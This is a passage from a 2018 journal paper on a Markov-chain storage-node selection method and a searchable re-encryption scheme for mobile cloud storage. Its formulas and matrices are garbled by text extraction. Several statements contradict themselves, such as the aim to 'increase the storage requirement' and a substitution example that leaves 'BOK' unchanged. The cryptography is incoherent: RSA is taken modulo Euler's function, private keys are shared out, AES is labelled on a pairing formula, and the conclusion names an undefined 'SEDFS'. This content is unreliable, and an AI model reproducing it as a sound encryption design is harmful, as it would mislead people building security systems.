The distribution matrix of the storage state in the cloud system is defined as R . And each data in the matrix is the storage cost on a certain storage node for data storing. Therefore, according to the storage cost of the nodes in large, medium and small three different states, the distribution matrix  iR of the storage status at time i t can be obtained. The matrix  iR is to be defined in formula (2).                T i i i T stXR stXR stXR is is is iR                          3 2 1 3 2 1 )( )( )(  B. The probability matrix of the state transfer The number of states in the state space is denoted with n . Therefore, the transfer probability can be represented in the form of matrix, which is defined as the probability matrix of state transfer. The probability matrix P of the state transfer always keeps the same. Moreover, and P is the matrix of order n . If the interval among n ttt ,,, 21  are always the same, according to homogeneity, P is defined in (3).               nnnn n n ppp ppp ppp P     21 22221 11211  Obviously, the transfer probability matrix has two properties, which are shown in formula (4).               n j ij ij nitp njitp 1 ,,2,11 ,,2,1,0    In equation (4), ij p refers to the probability of transition from the state i s to the other state j s . The sum of each row in the probability matrix is one. Moreover, the sum of the probabilities from the storage state i s to all the other storage states j s is one too. According to the analysis previous, each storage node in a storage group has different storage costs for storing three different size files. Therefore, in the cloud system, if a large, medium, and small files are need to be stored in the storage node, the higher the cost of integrated storage, the less likely this node is used to store data. On the contrary, the smaller the storage cost of the node for storing large, medium and small files, the more likely the node will be selected. The state space of SReCSM is represented in (1). The storage status transfer can be shown in figure 1. Small file status Large file status Secondary file status p31 p13 p12 p21 p32 p23 1-p31-p32 1-p21-p23 1-p12-p13 Figure 1. Storage status transition diagram According to the probability values of the transformation in three different states of the storage node, the probability matrix of the state transfer in the SReCSM is shown in formula (5). International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 34                32313231 23232121 13121312 1 1 1 pppp pppp pppp P  C. Algorithm of SReCSM Users access the network through a mobile terminal, and the mobile terminal will choose to communicate with the node which has the lowest cost in the storage group. Moreover, irregular connection is used in the storage group. Therefore, in order to improve the reliability of the cloud storage system, a multi-replica mechanism is introduced. The storage efficiency of the cloud system can be effectively improved by using Multi-replica mechanism. When a mobile terminal makes a request, a copy with the lowest cost can be chosen. However, in the traditional cloud storage system, the master copy is selected first only when the master copy is wrong. The request will then be sent to the backup copy regardless of the region. Therefore, this kind of storage will affect the speed of the cloud system. Based on this idea, the transfer probability of Markov chain is used in the SReCSM. The storage cost of each storage node is measured from the perspective of probability. The state matrix of one-step transfer will then be obtained by means of the probability matrix of the state transfer. Finally, the state matrix of multi-step transfer will be obtained to predict the probability of the storage cost at a certain time in the SReCSM. Therefore, the optimal storage node will be chosen to realize the data storage at the end. The main idea of the SReCSM algorithm in the cloud system will be introduced in the following chapter. The states of the storage in the strategy are proposed for the implementation of the data storage. Moreover, in the SReCSM algorithm of the cloud system, the standard of storage status division is proposed, which is convenient for engineering implementation. At the same time, the transfer expression of the state corresponding to the storage state is obtained. Then, on the base of the historical data stored in the cloud system, the probability matrix of state transfer is obtained. The probability and reliability of the storage status in the cloud system at some time in the future are predicted by using the probability matrix of the state transfer and the matrix of the storage state at the moment. The steps of the algorithm of the SReCSM based on Markov chain are described as follows: Step 1 The distribution matrix  0R of the SReCSM at the initial time 0 t is obtained. Step 2 According to the distribution matrix of the storage state and the probability matrix P of the state transition at 0t time, the state distribution matrix of one-step transfer  1R at next time will be got after t time. The state distribution matrix of one-step transfer  1R is shown in formula (6).     PRR 01   Step 3 Obviously, the storage distribution of the cloud storage system after t time is shown in formula (7).        2012 PRPRR   After a period of time, about m times t time, the storage status of cloud system is shown in formula (8).        mPRPmRmR 01   Through the procedure above,  0R and P are known, the steady-state value of the cloud storage distribution in the system can be predicted quickly in the future after every t time interval. According to the storage cost of data stored in different nodes, the storage cost matrix of the current time of the system is obtained, which is the state distribution matrix of the system. The state distribution matrix is shown in formula (9). International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 35                T i i i T stXR stXR stXR is is is iR                          3 2 1 3 2 1 )( )( )(  In formula (9), is represents the storage cost needed to select a storage node at time it . We can know from formula (9) that is is contained within the range of 0 to 1, which satisfies the inclusion relationship  1,0is . And i s is obtained by normalizing the correlation property, which is stored in the node at it time. There are three variables in related properties at time t. Three variables are represented by symbols q , d and l , which respectively represent the length, latency and packet loss of stored data respectively. The storage cost of the node will be got in formula (10).  llddqq ssss    In formula (10), three variables q , d and l satisfies the relationship in formula (11).       ldqk k ,, 1  Because parameters including q , d and l are all cost indicators. Therefore, the smaller the value, the better the quality of the data stored in this node. The storage cost will be got in formula (12) in this way.    ldqk kk kk s k ,, minmax max      In formula (11), q is obtained by the length of the stored data block. The parameters d and l are obtained by timing first, and then calculated through the time. Start the timer when each data block is stored at the beginning of the storage till the response is received. Therefore, the evaluation of the storage quality in each storage node is carried out through the above method. Moreover, and the distribution matrix of the storage status is updated in stages. The pseudo-code of the algorithm in SReCSM is described in figure 2. Figure 2. Pseudo-code in SReCSM Therefore, in the SReCSM based on Markov chains, the distribution of the state in the future will be got by means of the probability matrix P of the state transfer and the distribution matrix  0R of the state at the initial time. The distribution of the storage state at time nt will be calculated and the choice of SReCSM will be realized through matrix operation. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 36 IV. SEARCHABLE RE-ENCRYPTION METHOD The central idea of the searchable re-encryption is to generate a re-encryption key and decrypted while the keyword matched. By using searchable re-encryption method, SReCSM has increased the storage requirement due to the storing of all encrypted data. The objective of the proposed searchable re-encryption method is to increase the storage requirement, flexibility and reduce the security issues, overhead ratio and minimize the cost and searching time. This technique will not provide the effective data utilization. This technique is more simple and faster when sorting the arrays using the most significant radix sort. This technique will reduce the cost of the data owners and the time complexity will be reduced. This technique is more efficient and requires more storage space for the data. A. Symbol Definitions Symbols in the Searchable Re-encryption method are defined in the in Table I. TABLE I. SYMBOL DEFINITION Symbol Definition PR(K) Private key enabled by Data owners PU(K) Public key enabled by data owners Kw Keyword Db Database {all the data passed to the cloud servers will be stored here} Ek Editing Keyword Ed Encrypted Data PR(K)Re Re-encryptedPrivate key PU(K) Re Re-encrypted Public key Ed Re Re-encryptedEncrypted Data Dd Decrypted Data Kw(pu) Keyword assigned with the public key Kw(pr) Keyword assigned with the private key Do Data Owners (Sender) Du Data Users (Receiver) Cs Cloud Server (Third Party User) B. Keyword Editing By searching the keyword we can edit the keyword with the help of three notations. While editing the keyword it requires, insertion, deletion or substitution. Here assuming the notation as n and editing the keyword as Ek . Case 1 If ~= ( )Ek n i Inserting the character into the first place For example: Character string (old) = ‘‘BOK’’ If =3i ; ~= (3)Ek n In third place have to insert new character Character String (new) = ‘‘BOOK’’ Case 2 If ( )Ek n i Deleting the character into the first place For example: Character string (old) = ‘‘BOK’’ If =3i ; (3)Ek n In third place have to delete the letter Character String (new) = ‘‘BO’’ Case 3 If ( )Ek n i Substitute the character into the first place For example: Character string (old) = ‘‘BOK’’ If =3i ; (3)Ek n In third place have to substitute a new character Character String (new) = ‘‘BOK’’ These three different notations help in editing the keyword easily. If the data users apply the keyword with some mistakes, they can edit the keyword to recover their respective data by using these three different cases. C. Searchable Re-encryotion The central idea of the searchable re-encryption is to generate a re-encryption key and decrypte while the keyword matched. Re-encryption operates over two groups 1 G and 2G of prime order q with a bilinear map e : 1 1 2 G G G  . The system parameters are random generators International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 37 1 g G and   2,Z e g g G  . The Searchable Re-encryption can be defined in the following algorithms. Algorithm 2 follows that the Searchable Re-Encrypted Keyword and it will search the keyword to decrypt the files. If the keyword matched, the data can be decrypted and can bereceived and accessed by the users. Algorithm 2 Keyword Searching Input: Keyword for ( )PR K Output: Keyword Matched If ( )PR K Kw Goto  Db i Else If ( )Ek n i \\ case-3 Goto  Db i Else "Not Matching" End If ( )Ek n i \\ case-2 "Keyword Matched" Initially private key contains the keyword and that keyword will be searched in the database. Keyword with the private key should be verified in the database of data cloud storage. Data owners will transmit the data to the cloud servers and the cloud server will store the data in the database. The data users will receive the data from the database using the keyword. If the keyword did not match, data user use the editing scheme for insertion, deletion and substitution. If the keyword matched, data users will receive the data from the cloud servers which is explained in the Algorithm 2. Algorithm 3 Data sharing Generate ( )PU K ( )PR K   ( )= ,PU K Ed Kw pu   ( )=PR K Kw pr Do shares ( )PU K to Cs Do shares ( )PR K to Du Send Ed to Cs Du sends  Kw pr to Cs Cs verify  Kw pr If  Kw pu =  Kw pr Cs sends   ,Dd Kw pr to Du Algorithm 3 states that the data file sharing between the data owners and data users through the cloud server. Initially data owners will create the public key and private key. The public key will be shared to the cloud servers and the private key will be shared to the data users. Every private and public key has its own keyword based on that keyword the data users will retrieve the data. If the keyword of public key and keyword of private key is matched, cloud server will transmit the data to the data users. Algorithm 4 Data encryption Consider two prime numbers as x and y Assign z x y  , where z will be used for the modulo of private and public keys Assign Euler’s function as    ( 1) 1E z x y   Consider an integer as i such that  1 i E z  for all   , 1i E z  Where i and  E z are co-prime Assign  1 2, , , nD f f f  ; f as files, D as data and n as number of files.         1 2, , , nD z f z f z f z  Encrypted data,     ; ,zEd D z mod E Kw PU K International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 38 Algorithm 4 states that the data encryption scheme and this follows the RSA algorithm to encrypt the data. Initially the module multiplication of the two prime numbers will be calculated and this states that the Euler’s function and this integer value is co-prime. Each data will be encrypted with modulo of E (z). The encrypted data contains the public key and the private keyword and the each data will be modulo with the Euler’s function. Algorithm 5 Data Re-encryption Generate   Re PR K ,   Re PU K Assign  1 2, , , nD f f f  , 1g G ; f as files, D as data and n as number of files.         1 2, , , nD z f z f z f z  Re-Encrypted data, Re ( ) ( ( ), ( )) A A Ed C e PU K Ed C Algorithm 5 states that the data re-encryption scheme and this follows the AES algorithm to encrypt the data. The mobile user 'A' generates the re-encryption keys for authorized user's list 'U' using users' public key and personal private key as shown below: 1 Re Re ( ) ( ) ( ) ,i A x x i PU K PR K g u U    The CSReSM generates the * I q r Z randomly and encrypts the message using the following procedure: ( ) I I r r new Z Z PU K  ( ) ( )I I r r new Ed Z Z M   ( ) , ( )I I A r r x Ed C Z M Ed CA g   The CSReSM uploads the encrypted message ' ( )Ed C ' and ' ( ) A Ed C ' on behalf of the mobile user 'A'. The CSReSM transforms ' ( ) A Ed C ' into ' ( ) A Re Ed C ' using the re-encryption key Re( )PU K and ( )AEd C as shown in the following equation: Re ( ) ( ( ), ( )) A A Ed C e PU K Ed C = , ( ) i A A I x x x r e g g = ( ) i I x r e g g， Algorithm 6 Data decryption Consider D key =  ( ),PR K Kw For 1f  to N //Data files   Dd Ed mod PR K End for f loop Goto Dd Algorithm 6 states that the data decryption algorithm to decrypt the data using the above steps. Initially data users uses the decryption key and that decryption key contains private key with keyword. Select the number of files and then decrypt the data using modulo function. Each data will be decrypted using the decryption key. D. Security analysis Assuming that the reliability of the cloud storage system is identified by symbol A . The time of encryption through different encryption algorithms is t A , the encryption time t A is reversed first ， and after the normalization processing ， j A is got from t A . According to the Markov chain, the storage cost of the different node is normalized to be the value k A . The number of the storage states for the cloud storage is the value n the reliability model of the system is shown in formula (13).  ])1(1][)1(1[ n k n j AAA   International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 39 It can be concluded from the analysis of the reliability model. When the valet tends to be infinite, which means t , the storage cost of the node in the cloud system also tends to a certain stable value, and the state of storage strategy tends to be stable. When the value of j A and k A are more closer to 1, and the value of n is more large, the cloud storage system will be more reliable and with higher security. V. PROTOTYPE SYSTEM AND EXPERIMENT A. Prototype system HDFS and Dynamo are reliable solutions that are commonly used in the cloud storage system. HDFS is a distributed file system that is suitable for running on common hardware. Moreover, HDFS has good fault tolerance and can be used for inexpensive hardware. The program in HDFS has a lot of data sets. The file size in the HDFS is typically gigabyte to terabyte. As a result, terabytes of large files can be supported in HDFS through higher aggregated data bandwidth. Therefore, hundreds of nodal devices can be contained in a cluster, which allowing the terabytes of large files to be supported in it. The consistency hash algorithm is used by Dynamo. At that time, it's not the exact hash value, but a range of hash values. When the hash value of the key is in this range, it will be searched clockwise along the loop, and the first node encountered is what we need. The consistency hash algorithm is improved by Dynamo, and in the ring，a set of devices are acted as a node rather than only one device is acted as a node. The synchronization mechanism is used to achieve the consistency of the data. In HDFS, numbers of the copies are set to be three. Whether the data would be stored in the node or not depends on the capacity of the node. The greater the capacity of the node is, the greater the probability that the data will be stored in this node. Therefore, when the capacity of the node is very different, the node with large capacity in the system would be overloaded. According to the analysis above, the storage cost of each storage node in the cloud system is measured from the perspective of probability. Moreover, the dynamic copy mechanism is adopted to adjust the number of copies in the storage strategy and their placement in real time according to the system performance requirement, load and so on. With the probability of passing the Markov chain, the dynamic replica mechanism can be used to complete data storage in time. The reliability and availability of SReCSM are improved effectively. The storage group is used as the hardware architecture of the cloud storage system. Moreover, the storage group system is connected in the irregular network. The architecture of the storage group is shown in figure 3. The PC is used as a storage medium in the storage group. However, the reliability of the PC is not high, and it will even fail when the data are stored. Therefore, a copy is required to ensure that the data is reliable. According to the reliability criteria of the system, the storage state of the cloud system is divided into three types: small file status, large file status and secondary file status between the two. Figure 3. The system architecture diagram of the storage group In the storage group system, all information about adjacent nodes is stored in every PC. The storage nodes needed can be found quickly through querying the information stored in the nodes. According to the transfer probability matrix and state distribution matrix of the SReCSM described precious, the storage strategy of a certain time is predicted. The structure of storage space in the storage group is ring, and at the same time, the method of the unified addressing is adopted. In the storage group, the difference in performance of the PC can be offset by the virtual contiguous storage space. First, the hash algorithm message-digest is used to implement system address conversion. The actual physical address is processed and converted to 32-bit information string through the MD5 algorithm. And then these information strings are stored in the virtual continuous International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 40 address. Thus, the differences in performance between devices will be offset. The converted address is mapped to the virtual storage space loop of the storage group through the MD5 algorithm. The device is found in the clockwise direction, and then the data is stored in the first PC mapped. Therefore, the data is backed up to two adjacent PC. The larger the amount of data in the system, the more uniform the spatial distribution will be. The data are stored when the routing of the corresponding PC and adjacent PC are updated. The routing information table is shown in Table II. TABLE II. ROUTING TABLE Field Type Length Note ID int Serial number fname varchar 255 Filename fsize int File size IP varchar 15 IP address The IP address of the PC device where the file replica located is stored in the IP field in the routing information table. The IP field is the routing information for the adjacent PC. However, once a node fails, all the information stored in the node are backed up and the routing information of the adjacent node is modified in time. According to the principle of the consistency hash algorithm, the storage space of the new PC device will be mapped to the new virtual address space when a new device needs to be added to the storage group. The existing space on the ring will not be changed, and this method can be very effective in avoiding the vibration of the address space. Meanwhile, the routing information on the adjacent PC is updated. The process of adding a PC is as shown in figure 4. The IP address of the adjacent PC is got by broadcast The virtual address is obtained through the consistency hash algorithm Update the routing table Update the routing table of the adjacent PC Figure 4. The process of adding a PC B. Experiments and result analysis The proposed scheme SReCSM Searchable Re-encryption Cloud Storage Method based on Markov Chain was developed by using the Java coding in the Linux platform. Finally evaluation of the overall performance of the proposed scheme in the real time data applications is done. This proposed scheme involved data owners and data users. Data owners create the encrypted data and then re-encrypted data will be forwarded to the cloud storage servers. Data users will decrypt the data using the keyword and private key. In this section, we analyzed the prediction, the searching time, searching efficiency and storage space while performing moving, copying, encryption, decryption, and re-encryption operations. The final results are compared with the existing techniques such as CReS Cloud-based Re-encryption Scheme, MReS Searchable Encrypted Data File Sharing scheme. 1) Prediction of SReCSM SReCSM based on Markov chain is processed by class Dynamo system model. On the basis of the thought and model mentioned above，the algorithm is implemented in python and verified by example. The simulation experiment is only to verify the Markov characteristics of distributed storage strategy. At first, the Monte Carlo method is used to simulate 8000 times and 300 intervals each time. The distribution of storage state in these intervals and the change of storage status between adjacent intervals are counted. The state transfer probability matrix of the stored strategy is shown in formula (14).             813.0185.0002.0 006.0986.0008.0 001.0013.0986.0 P  The meaning of the state transfer probability matrix P is described as follows. Suppose the last time the cloud system is in a small file storage state. At the next moment, the probability of 0.986 is kept in a small storage state; the probability of 0.013 is transferred to the secondary storage International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 41 state; and the probability of 0.001 is transferred to the large storage state. The storage group in figure 2 contains 10 nodes. Because the hardware performance, load situation and network link state of the storage nodes in the cloud system are different, the storage cost of each node is different. Assuming at the initial moment 0 t , the storage costs for large, medium, and small storage states are 1 s ， 2 s and 3 s respectively. The storage status distribution matrix  0R of the cloud storage system at time 0 t can be obtained through formula (2). The storage status distribution matrix  0R is shown in formula (15).                                                45.030.025.0 45.035.020.0 75.015.010.0 35.035.030.0 50.025.025.0 35.030.035.0 50.030.020.0 40.045.015.0 45.020.035.0 70.020.010.0 0 3 2 1 T s s s R  The formula (10) (11) is substituted into formula (6), and a one-step storage state distribution matrix is obtained, which is shown in formula (16).                                     36790.038230.024980.0 36815.043095.020090.0 61075.028795.010130.0 28695.041370.029930.0 40825.034225.024950.0 28670.036510.034820.0 40850.039090.020060.0 32805.051965.015230.0 36740.028500.034760.0 57040.032800.010160.0 1R  After a multi-step transition, the storage state distribution matrix  iR at time i t is predicted quickly, which is shown in formula (17).                                     1701969.05767937.02530094.0 1710047.06207354.02082608.0 2753594.06116927.01129479.0 1351428.05651607.02996965.0 1873201.05606398.02520400.0 1343350.05212299.03444450.0 1881279.06045806.02072915.0 1546892.06808290.01644820.0 1685814.04889122.03425064.0 2582362.06278466.01139180.0 iR  The node with the lowest storage cost can be quickly selected by using the storage status distribution matrix introduced in equation (17), which can realize real-time data storage. 2) Uploading and Downloading of SReCSM The data response tests are performed on file upload, file copy and file movement, for large files and small files respectively. Experimental results demonstrate that the page is properly displayed, and the response time of the login page is basically completed within two seconds. The percentage of the response time for the transaction is shown in figure 5. Figure 5. The percentage of the response time for the transaction Through the analysis of figure 6, it can be known that 94 percent of transactions in a mobile cloud storage system can be implemented quickly within two seconds. The experimental results show that the system responds fast. The International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 42 average response time of the transaction is obtained from the diagram. Although one of the response timing of transaction is longer, however the response time for most other transactions is acceptable. When this happens, it is thought that the performance of the mobile cloud storage system is better. Table III and Table IV are the test result. TABLE III. THE PERFORMANCE OF THE MOBILE END UPLOAD THE DATA type of test utilization rate of Mobile CPU（%） transmissi on rate （Mbps） utilization rate of Mobile /transmission rate Raw data 16.436 3.57020 4.603663 After the encryption 38.432 2.36015 16.283711 TABLE IV. THE PERFORMANCE OF THE MOBILE END DOWNLOAD THE DATA type of test utilization rate of Mobile CPU （%） transmissio n rate （Mbps） utilization rate of Mobile /transmission rate Raw data 14.681 3.90135 3.763056 After the encryption 35.221 2.76147 12.754439 The ratio of CPU occupancy to upload speed is shown in table III, which the data on the mobile side are tested before the encryption and after the encryption respectively. The ratio of CPU occupancy to download speed is shown in table IV, which the data on the mobile side are tested before the decryption and after the decryption respectively. It can be known from the table III and the table IV, if the encryption and decryption mechanism are used for HDFS transmission, then the CPU utilization will be increased by an average of 22% ~ 25% and the overall file transfer rate will be reduced by 30% ~ 35%. As we can see，when the encryption and the decryption mechanism are used, more than three times the performance loss can be caused on the mobile end side. 3) Encryption and Re-Encryption After applying the keywords, based on that proposed scheme it will search the keyword. If it matches, data users will receive their respective data. Based on the searching time and the storage space comparison graph has discussed below. Data users considered for the proposed scheme is 500 users and the available search keyword vary from 500 to 5000. Cloud servers storage space obtain more than 100 bytes and it uses the database to store all the encrypted data and the keywords. There are two questions to be considered: One is the impact of encryption and decryption on file speed. The other is the impact of encryption and decryption on the performance of the client host. The experimental data are listed in Table V, which includes the time spent on encrypting the different sizes or different type files by using SReCSM and the time spent on transmitting the file in HDFS. TABLE V. TIME COMPARISON ON ENCRYPTION AND DECRYPTION BY USING SRECSM File size （M） File type SReCSM encryption （ms） HDS upload （ms） SReCSMdec ryption（ms） HDS download （ms） 3.07 pdf 1050 2685 370 2800 3.22 MP3 1178 2600 478 2830 23.8 mkv 3238 5930 2648 6290 25.8 doc 3140 5260 2163 6400 166.518 rmvb 23830 46400 16500 42460 It can be concluded from the above test data, the time spent on encryption or decryption by using SReCSM is regardless of the file type. The time comparison on SReCSM encryption and re-encryption is shown in figure 6. We can see from figure 6 that there is little difference between encryption time and re-encryption time. Figure 6. Time comparison on SReCSM encryption and Re-encryption International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 43 The same size files are encrypted by different CReS Cloud-based Re-encryption Scheme, MReS Manager-based Re-encryption Scheme, or SReCSM algorithms and then the re-encryption time is different, as shown in table VI and figure 7. The 167.58 MB file in table VI is the test case. TABLE VI. TIME COMPARISON FOR DIFFERENT ALGORITHM ENCRYPTION File size（M） MReS Re-encrypt（ms） CReSRe-encry pt（ms） SReCSMRe-en crypt（ms） 3.04 1048 770 720 23.15 3230 2901 2600 80.35 12010 10230 8560 167.58 23820 23612 23598 Figure 7. Comparison of Re-encryption time In the SReCSM proposed in this paper，the time of encryption or decryption is relatively short. File transferring have little impact on total time loss and user experience. It may take a relatively long time to encrypt files by using the CReS, which cause a significant additional time overhead for HDFS. However, the encryption time that MReS encrypting the file was not significantly increased compared to SReCSM. Besides the impact on overall transmission rates, the impact of encryption and decryption on mobile performance is also important. In the next experiment, we compared the searching time, searching efficiency and storage space while performing the encryption and re-encryption operations. Figure 8. Storage spaceversus number of keyword Figure 8 shows that the comparison graph of storage space in different algorithms. When there is increasing of the number of keywords, it requires more storage space. The existing algorithms CReS, MReS have require more storage space. But the proposed Searchable Re-encryption Cloud Storage Method (SReCSM) reduce the storage space requirement and utilize the data transfer effectively. Figure 9. Searchingtimeversus number of keyword Figure 9 shows that the comparison graph of the searching time and number of keywords. The number of keyword vary from 500 to 5000. When the number of keyword increases, searching time also increase. In previous techniques, CReS and MReS use the more searching time. However, SReCSM uses lesser time to search the data. If searching word is not matched, immediately the proposed SReCSM uses the editing values. Based on this different cases, the proposed SReCSM decreases the searching time. MReS, CReS, and SReCSM offload the re-encryption operations on cloud. Therefore, in this experiment we examined the turnaround time and energy consumption on cloud while performing the re-encryption operations. The experimental results are shown in Fig. 10. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 44 Figure 10. Comparison while performing re-encryption and decryption It can be observed from the results presented in Figs. 10a and b that the increase in the size of file increases the turnaround time and energy consumption for completing the re-encryption operations on the mobile device. The increase in turnaround time and energy consumption is due to the increase in number of re-encryption operations while increasing the number of files. However, Figs. 10c and d show that the increase in the size of file increases the turnaround time and energy consumption for completing the decryption operations on the mobile device. The increase in turnaround time and energy consumption is due to the increase in number of decryption operations while increasing the size of files. Using the reliability model formula (13) of the cloud storage system proposed in 4.4, combine the time required for processing the same size of file in table IV, when a different algorithm CReS, MReS and SReCSM is used, the encryption time required for encrypting file, after that the encryption time is reversed, j A then be got after the encryption time is normalized. In the same way, after normalizing, storage cost k A is got. If both j A and k A are closer to 1, and the number of storage state in the cloud storage system is larger, then the reliability of the system is higher. According to the above analysis，the data in one hour is sampled continuously, combined with the data in table IV and table V, the reliability contrast diagram for SReCSM is shown in figure 11. Figure 11. The reliability contrast diagram It can be know the reliability of the system through different algorithm by comparing the data in figure 11. By using the CReS re-encryption， the reliability values are almost maintained at one. The reliability of the system is relatively high. That is， it has little impact on file transfer and user experience by using CReS re-encryption. It may take a relatively long time to re-encrypt files by using the MReS. And the reliability is very jitter. It is shown that the reliability is low with MReS re-encryption. However, the re-encryption time that MReS combined with CReS for re-encrypting the file was not significantly increased compared with CReS. The value of the reliability is consistent with the use of CReS, which can be maintained around one. It is concluded that the system is relatively reliable by using SReCSM encryption. Through these simulation experiments, it is verified that SReCSM has a good user experience. It is also verified that the mechanism of SReCSM can effectively improve the efficiency of the cloud storage. When a mobile terminal makes a request, the optimal node is selected and then the time can be saved effectively. In the SReCSM presented in this paper, the re-encryption and decryption has the following characteristics: transport security and storage security of the user data are guaranteed. The mobile finishes the re-encryption before calculating the checksum, so the re-encryption will not break the HDFS data integrity check mechanism. In the entire distributed file storage system, the re-encryption and decryption are International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 45 scattered to the various mobile devices. While this will cause some performance damage to the mobile, there is no additional performance penalty for name node and data node. VI. CONCLUSIONS AND FUTURE WORK CReS and MReS re-encrypts the keyword to transmit safety. But these two schemes are more complex and need more time to re-encrypt. To optimize the cloud storage, safety transmission, minimize the cost and searching time, here we have proposed a new scheme as searchable re-encrypted data in SReCSM. This proposed searchable re-encryption method supports the periodical and secure prediction by using the steady Markov strategy in stages and determine the lowest storage cost. SReCSM increases the storage requirement, flexibility and reduce the security issues, overhead ratio and minimize the cost and searching time. The SReCSM based on Markov chain proposed in the paper has high reliability proved through a series of simulation experiments. The comparison graph evaluate the turnaround time and energy consumption with the different size of files. By increasing the size of files, proposed SReCSM can achieve accurate predictions, reduce the storage space requirement and the re-encrypting time. And then the data is scheduled to be stored in the node with the lowest storage cost. Finally conclude that the SEDFS proposed in this paper has better security and reliability. And this SReCSM reduces the storage space requirement, security issues, searching time and increases the searching efficiency. ACKNOWLEDGMENT Foundation item: The Industrial research project of Science and Technology Department of Shaanxi Province(Grant No. 2016KTZDGY4-09); Laboratory fund of Xi 'an Technological University (GSYSJ2017007) REFERENCES [1] Karel, Ferreira, Denzil,Goncalves, Jorge,Kostakos, Vassilis, De Moor, Katrien: Mobile cloud storage: A contextual experienceVandenbroucke.In: MobileHCI 2014 - Proceedings of the 16th ACM International Conference on Human-Computer Interaction with Mobile Devices and Services, p 101-110, September 23, 2014 [2] Mitsutaka Kimura,Xufeng Zhao, Toshio Nakagawa: Using Markov Renewal Processes.Principles of Performance and Reliability Modeling and Evaluation Reliability Analysis of a Cloud Computing System with Replication, pp. 401-423(2016) [3] Choo, Kim-Kwang Raymond: Mobile cloud storage users. In: IEEE Cloud Computing,v 1, n 3, p 20-23, September 1, 2014 [4] Iliadis, I., Sotnikov, D., Ta-Shma, P., Venkatesan, V.: Reliability of geo-replicated Cloud storage systems. In: 2014 IEEE 20th Pacific Rim International Symposium on Dependable Computing, pp. 169–179 (2014) [5] Jeyanthy, C.,Shaji, R.S.,Jayan, J.P., Symmetric key based cryptic scheme for mobile cloud storage.In: Global Conference on Communication Technologies, GCCT 2015, p 571-575, November 30, 2015 [6] Jung, Kye-Dong, Moon, Seok-Jae, Kim, Jin-Mook: Data access control method for multimedia content data sharing and security based onXMDR-DAI in mobile cloud storage.Multimedia Tools and Applications, v 76, n 19, p 19983-19999, October 1, 2017 [7] Chekam, T.T., Zhai, E., Li, Z., Cui, Y., Ren, K.: On the synchronization bottleneck of OpenStack Swift-like cloud storage systems. In: IEEE INFOCOM 2016 - The 35th Annual IEEE International Conference on Computer Communications, pp. 1–9 (2016) [8] Li, L., Li, D., Su, Z., Jin, L., Huang, G.: Performance analysis and framework optimization of open source cloud storage system. China Commun. 13(6), 110–122 (2016) [9] Iliadis, I., Sotnikov, D., Ta-Shma, P., Venkatesan, V.: Reliability of geo-replicated Cloud storage systems. In: 2014 IEEE 20th Pacific Rim International Symposium on Dependable Computing, pp. 169–179 (2014) [10] Yu, Xiaojun, Wen, Qiaoyan: Design of security solution to mobile cloud storage. Advances in Intelligent and Soft Computing, v 135, p 255-263, 2012 [11] Han, Lin; Huang, Hao; Xie, Chang-Sheng: Multi-path data prefetching in mobile cloud storage. In: Proceedings - 2014 International Conference on Cloud Computing and Big Data, CCBD 2014, p 16-19, March17, 2014; [12] Lee, Giwon; Ko, Haneul; Pack, Sangheon: An Efficient Delta Synchronization Algorithm for Mobile Cloud Storage Applications. IEEE Transactions on Services Computing, v 10, n 3, p 341-351, May-June 2017; [13] SystemWang, Yan; Wang, Jinkuan: An Optimized Replica Distribution Method in Cloud Storage. Journal of Control Science and Engineering, v 2017 [14] Zhang, Rui; Lin, Chuang; Meng, Kun; Zhu, Lin: A modeling reliability analysis technique for cloud storage system. In: International Conference on Communication Technology Proceedings, ICCT, p 32-36, 2013, ICCT 2013 -Proceedings of 2013 15th IEEE International Conference on Communication Technology [15] Chen, Ming-Hung; Tung, Yu-Chih; Hung, Shih-Hao; Lin, Kate Ching-Ju; Chou, Cheng-Fu: Availability Is Not Enough: Minimizing Joint Response Time in Peer-Assisted CloudStorage Systems. IEEE Systems Journal, v 10, n 4, p 1424-1434, December 2016 [16] Tysowski, P.K., Hasan, M.A.: Re-encryption-based keymanagement towards secure and scalable mobile applica-tions in clouds. IACR Cryptology ePrint Archive 668, 2011(2011) [17] Zhao, G., Rong, C., Li, J., Zhang, F., Tang, Y.: Trusteddata sharing over untrusted cloud storage providers, pre-sented at the IEEE Second International Conference onCloud Computing Technology and Science (CloudCom’10), Washington, DC, USA (2010) [18] Yang, J., Wang, H., Wang, J., Tan, C., Yu, D.: Provabledata possession of resource-constrained mobile devicesin cloud computing. Journal of Networks 6, 1033–1040(2011) [19] Itani, W., Kayssi, A., Chehab, A.: Energy-efficient incre-mental integrity for securing storage in mobile cloudcomputing, presented at mailto:kimura@gifu-cwc.ac.jp http://h-s.link.springer.com.lib-ycfw.xatu.edu.cn/book/10.1007/978-3-319-30599-8 http://h-s.link.springer.com.lib-ycfw.xatu.edu.cn/book/10.1007/978-3-319-30599-8 International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 46 the International Conference onEnergy Aware Computing (ICEAC ’10) Cairo, Egypt(2010) [20] Ren, W., Yu, L., Gao, R., Xiong, F.: Lightweight andcompromise resilient storage outsourcing with distributedsecure accessibility in mobile cloud computing. TsinghuaScience & Technology 16, 520–528 (2011) [21] Yu, S., Wang, C., Ren, K., Lou, W.: Achieving secure, scalable, and fine-grained data access control in cloud com-puting, presented atthe Proceedings IEEE(INFOCOM’10)NJ, USA (2010) [22] Jia, W., Zhu, H., Cao, Z., Wei, L., Lin, X.: SDSM: Asecure data service mechanism in mobile cloud computing,presented at the IEEE Conference on Computer Commu-nications Workshops (INFOCOM ’11) Shanghai, China(2011) [23] Zhou, Z., Huang, D.: Efficient and secure data storage operations for mobile cloud computing, presented at the 8thInternational Conference on Network and Service Management (CNSM ’12), AZ, USA (2012) [24] Ateniese, G., Fu, K., Green, M., Hohenberger, S.: Improvedproxy re-encryption schemes with applications to securedistributed storage. ACM Trans. 